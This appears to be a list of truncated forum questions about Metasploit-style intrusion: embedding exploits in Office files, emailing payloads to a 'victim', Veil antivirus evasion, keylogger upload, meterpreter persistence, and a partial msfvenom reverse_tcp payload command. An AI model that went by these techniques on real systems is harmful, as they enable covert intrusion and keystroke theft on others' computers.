Is there any exploits that could be embeded into a simple picture or office/document type file that would work with Office 2003 Windows 7 SP1 updated? I know there is a RTF exploit for word 2003, but it does not work if the computer has been patched to SP1. I searched the dat ...more
I am wondering if a keylogger exists, where I can upload it via a meterpreter session, upload to the startup folder, and it logs the keystrokes to a file (or even to a specific ip), so that a constant meterpreter session is not required. Has anyone done this before? I know th ...more
I am trying to find the best way to send my payload via email to the victim and then have them open it. However, with most payloads being .py, .bat,. or exe this does not seem like it would work easily or even at all. I saw some guides on how to embed a veil payload in an offi ...more
I am using my desktop at another location to try and get persistence working. I started the meterpreter session, ran the persistence, it installed, successfully, said something about installing to the registry and stuff and then took me back to meterpreter. I did it using por ...more
I am using a veil evasion exploit that is embedded inside a Excel document, and is not detected by AV. I have tested it myself on different WAN computers(windows only) and it has worked perfectly, but now I tried to execute on on another computer(the victim a friend, knowingly ...more
I got into a meterpreter session without any issues, but now want to make sure I can reconnect to the victim (my desktop) after reboots. I tried using persistence but the AV caught it. I feel like there is a way to encode it that should work, but I am not sure how to encode a ...more
I want to use a metasploit payload I made via WLAN instead of LAN. I got lan working fine using my local ip and port 4444. However, when I create the payload using LHOST = myPubIp, and using ports 443, 80, 8080, 4444(tried all these) it does not connect, rather it just says f ...more
So I am trying to hack my own computer just for fun. I am at work and my computer is on my home network, so I am assuming anywhere LHOST appears, I put my public IP and port 80 for LPORT? So I created this exploit by doing : msfvenom -p windows/meterpreter/reversetcp LHOST= ...more
I was testing out sending a exploit to another computer last night and it asked for the LHost so that once the exploit was activated it knew where to send the information back to. Won't mind change unless I have a static IP? Or not necessarily ? Also do I need to leave the met ...more